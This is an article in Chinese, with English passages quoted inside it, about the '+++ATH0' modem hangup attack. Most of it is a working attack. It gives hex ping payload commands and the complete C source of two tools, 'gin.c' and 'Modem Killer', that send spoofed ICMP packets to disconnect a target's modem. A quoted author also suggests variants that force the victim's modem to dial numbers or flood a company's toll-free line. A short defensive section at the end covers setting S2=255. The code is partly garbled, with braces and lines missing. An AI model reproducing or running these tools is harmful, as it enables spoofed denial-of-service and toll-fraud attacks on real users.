经常上IRC和聊天室的朋友,大概都有在聊的兴起时突然吊线的情况吧,也许您想那没关系,再上去嘛,可同样的情况又发生了,这!◎#¥%是为什么呢?排除您调制解调器的原因,那就是有人用一些“炸弹”轰炸你。我也有这样的痛苦经历,所以找了些资料读给大家,比如:“怎样远程管理Modems?怎样远程发送AT 命令?我知道他的IP,如何让他断线?我怎样手动控制调制解调器?我怎样防止ATH攻击者?”

   首先说一下,数据包再Internet或LAN上的简单传输过程,假设,您的IP为 xx.xx.xx.xx,您要访问的服

C Program at Source --------------Router ---------------Daemon at Destination’s Port

(xx.xx.xx.xx) (yy.yy.yy.yy)


C Program at source-Modem of Source-Router--Modem of Destination--Destination Daemon

,所以多数调制解调器为“贺氏兼容”---AT Command set.


ATDT or ATDP 电话号码





ping -c 5 -p 2b2b2b415453323d32353526574f310d ip

如果这个命令你不理解,可以看看*nix box:
$>man ping



ping -p 2b2b2b415448300d $*


[ explanation ]

The way the exploit works is it hides escape/control sequences in a ICMP

echo_request packet (it contains the string +++ATH0) the +++ sends the

modem into escape mode (and if the guard time on the modem is set

ridiculously low) it will go into command mode and you can issue it an

ATH0 to hang up. It works on the reply, because it receives the

echo_request packet, then duplicates the packet with a new timestamp and

checksum, dest/source hosts and returns it to the sender, when it returns

it the string is sent to the modem, and thus hanging it up. There are a

few conditions that must be met for it to work (if you dont want to be

vulnerable to this, fix these!)

1) target computer must not filter ICMP echo_request and must know how to

reply to one if it gets one

2) target computer must be using a modem (you can't hangup DS3s, although

i suppose you could hangup telco return connections..if you can find one)

3) target computer must have a vulnerable modem (i.e. guard time is set

ridiculously low)

4) you have to be able to send spoofed packets (or..if you can't i guess

you can use your own address, but then the target knows where it came


In my experimenting, I have also devised various fun ways to use this

program other than just nuking your buddy off IRC. In theory..it is

possible to modify the program to do fun stuff like make the target call

some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the

modem hangup, pause for 6 seconds then call 5551212..this is fun for

obvious reasons. Then the next variation I came up with is a smurf like

implementation in which you could make a script to DoS a class C subnet,

with the number of your least favorite company, since most company's have

800 numbers, not only does this cause chaos to the phone bank, but also

costs ~$.30 per call...but i don't condone any of those ideas of course,

this is just for experimental/educational purposes only, if you fix your

modems, none of this is possible, so get off your ass and fix it.

script kiddiez: here is your code...



* gin.c

* jpester@engr.csulb.edu

#include <stdio.h>

#include <signal.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <ctype.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <sys/time.h>

#define VERSION "1.2-05.05" //fixed old compiler compatibility problems

#define FRIEND "foo"

void usage( char *name );

void banner( void );

char *get_progname( char *fullname );

void done( int foo );

void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );

unsigned short in_chksum( u_short *ipbuf, int iplen );

int main( int argc, char **argv )


struct hostent *sourceinfo, *destinfo;

struct sockaddr_in sin, din;

int sockfd, numpackets, i;

char *target, *source;


( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;

source = argv[1];

target = argv[2];

numpackets = ( atoi( argv[3] ) );

signal( SIGINT, done );

if( ( sourceinfo = gethostbyname( source ) ) == NULL )


printf( "cannot resolve source host!\n" );

exit( -1 );


memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,

sourceinfo->h_length );

sin.sin_family = AF_INET;

if( ( destinfo = gethostbyname( target ) ) == NULL )


printf( "cannot resolve destination host!\n" );

exit( -1 );


memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,

destinfo->h_length );

din.sin_family = AF_INET;

if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )


printf( "Cannot get raw socket, you must be root!\n" );

exit( -1 );


printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );

printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );

printf( "Number\t\t\t: %d\n", numpackets );

printf( "Have some gin sucka" );

for( i = 0; i < numpackets; i++ )

gin( sockfd, sin, din );

printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1


? 's' : ( char )NULL );

return 0;


void usage( char *name )


printf( "usage: %s <source host> <dest host> <num packets>\n[ http://www.rootshell.com/
] \n\n", name


exit( 0 );


void banner( void )


printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );

printf( "compiled for: %s\n\n", FRIEND );


char *get_progname( char *fullname )


char *retval = strrchr( fullname, '/' );

return retval ? ++retval : fullname;


void done( int foo )


puts( "Exiting...\n" );

exit( 1 );


void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )


char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";

char *packet;

int total;

struct iphdr *ip;

struct icmphdr *icmp;

size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );

size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct

timeval );

int len = strlen( ginstring );

packet = ( char * )malloc( iphlen + icplen + len );

ip = ( struct iphdr * )packet;

icmp = ( struct icmphdr * )( packet + iphlen );

( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen


( struct timezone * )NULL );

memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 )


ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );

ip->version = 4;

ip->ihl = 5;

ip->tos = 0;

ip->ttl = 255;

ip->protocol = IPPROTO_ICMP;

ip->saddr = sin.sin_addr.s_addr;

ip->daddr = din.sin_addr.s_addr;

ip->check = in_chksum( ( u_short * )ip, iphlen );

icmp->type = ICMP_ECHO;

icmp->code = 0;

icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )

) );

total = ( iphlen + icplen + timlen + len + 16 );

sendto( port, packet, total, 0,

( struct sockaddr * )&din, sizeof( struct sockaddr ) );

free( packet );


// stolen from smurf

unsigned short in_chksum( u_short *ipbuf, int iplen )


register int nleft = iplen;

register int sum = 0;

u_short answer = 0;

while( nleft > 1 )


sum += *ipbuf++;

nleft -= 2;


if( nleft == 1 )


*( u_char * )( &answer ) = *( u_char * )ipbuf;

sum += answer;


sum = ( sum >> 16 ) + ( sum + 0xffff );

sum += ( sum >> 16 );

answer = ~sum;

return( answer );



但有些机器运行此程序时出错,将环境变量MALLOC_CHECK_改为1即可,如果编译出错(请用g++ -O3 -o
gin gin.c)

Yet, another program, (a better one) from their Archive:

/* Hi, this is basically a small C program to quickly use the +++AZH0 modem

bug on a given target. This thing is handy because you do not have to go

through the trouble of typing the ping string, and it spoofs, which is also

quite handy :)

Anyway, use this to disconnect most modems on ANY OS on the internet by

sending an ICMP_ECHO_REQUEST with the contents of +++AZH0. The modem gets

it and (since it's an ICMP ECHO) sends the same packet back and resets. It

can be patched by setting the modem register S2 to such a value that turns

the command mode of the modem off (255 will do). The modem

will NOT execute the commands in the packets anymore and function stable.

NOTE: Before you actually USE this program, turn your OWN command mode of

Else, your modem will RESET upon trying to send the packets away.

Put the statement S2=255 somewhere in your modem CALL STRING.

It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>

At least, it does so on my modem. Note that some modems will get into trouble

with the command mode turned off. If this is the case, tough, you CANNOT use

this program AND you ARE VULNERABLE to this attack.

This should be it, all you script kiddies, have fun.

Do with this code wathever you want, it's way too simple and lame.

Have fun,


If you think this program is truly cool (which is not true) mail me at:

ronald. huizer@wxs.nl

If you sincerely wish to flame me, mail me at:


This mailaddress is forwarded to someone I really dislike.

The way to patch a modem has been added thanks to Ardrian Gonzales...

Some modems may disconnect when trying to use the patch.


#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/socket.h>

#include <netdb.h>

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

#define BUFFER 80

#define RESET "+++ATH0\x0d"

#define PATCH "+++ATH0H1TD112\x0d"

int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);

unsigned short in_cksum(u_short *addr, int len);

int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned
int type)


unsigned char *packet;

struct iphdr *ip;

struct icmphdr *icmp;

char *blah;

int rc;

int c;

int b=0;


{ case (0): { blah = RESET; break; }

case (1): { blah = PATCH; break; }

default: blah = RESET;


packet = (unsigned char *)malloc(sizeof(struct iphdr) +

sizeof(struct icmphdr) + BUFFER);

ip = (struct iphdr *)packet;

icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));

for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)


if(b==strlen(blah)) b=0;




/* This is the IP header of our packet. */

ip->ihl = 5;

ip->version = 4;

ip->tos = 0;

ip->id = htons(43210);

ip->frag_off = htons(0);

ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);

ip->ttl = 25;

ip->protocol = IPPROTO_ICMP;

ip->saddr = spoof_addr;

ip->daddr = dest_addr->sin_addr.s_addr;

ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));

icmp->type = ICMP_ECHO;

icmp->code = 0;

icmp->checksum = 0;

icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);

if (sendto(socket,


sizeof(struct iphdr) +

sizeof(struct icmphdr) + BUFFER,0,

(struct sockaddr *)dest_addr,

sizeof(struct sockaddr)) == -1) { return(-1); }




int main(int argc, char **argv)


struct sockaddr_in dest_addr;

unsigned int i,sock,type;

unsigned long src_addr;



fprintf(stderr, "You must be ROOT in order to run this!\n");



printf("Modem Killer - Version 1.0b - Spoofable\n");

printf("By Scrippie\n");

if ((argc != 5)) {

printf("Use the following format:\n");

printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);

printf("Where type means the type of the modem crash.\n");


printf("Type 0: Makes the modem hangup\n");

printf("Type 1: Patches a modem against attacks\n");


printf("Greetz, Scrippie\n");





case (0): { type = 0; break; }

case (1): { type = 1; break; }

default:{ printf("WRONG type you idiot!\n"); return(-1); }


if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)


fprintf(stderr,"No RAW sockets available...\n");



if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }

src_addr = dest_addr.sin_addr.s_addr;

if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }

printf("Now sending the modem kill...\n");

for (i = 0;i < atoi(argv[3]);i++)


if (killmodem(sock, src_addr, &dest_addr, type) == -1)


fprintf(stderr,"Cannot send packet...\n");







*** Of course, no one has EVER seen this piece of networking code before... ***


int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)


struct hostent *host;

memset(addr,0,sizeof(struct sockaddr_in));

addr->sin_family = AF_INET;

addr->sin_addr.s_addr = inet_addr(name);

if (addr->sin_addr.s_addr == -1) {

if (( host = gethostbyname(name) ) == NULL ) {

fprintf(stderr,"Unable to resolve host %s\n",name);



addr->sin_family = host->h_addrtype;



addr->sin_port = htons(port);



unsigned short in_cksum(u_short *addr, int len)


register int nleft = len;

register u_short *w = addr;

register int sum = 0;

u_short answer = 0;


* Our algorithm is simple, using a 32 bit accumulator (sum), we add

* sequential 16 bit words to it, and at the end, fold back all the

* carry bits from the top 16 bits into the lower 16 bits.


while (nleft > 1) {

sum += *w++;

nleft -= 2;


/* mop up an odd byte, if necessary */

if (nleft == 1) {

*(u_char *)(&answer) = *(u_char *)w ;

sum += answer;


/* add back carry outs from top 16 bits to low 16 bits */

sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */

sum += (sum >> 16); /* add carry */

answer = ~sum; /* truncate to 16 bits */




另外,保护您不受ATH0攻击,防止你的Modem模式被改变,您需要:Set your init string to: S2=255.


1 更改你的registry key:




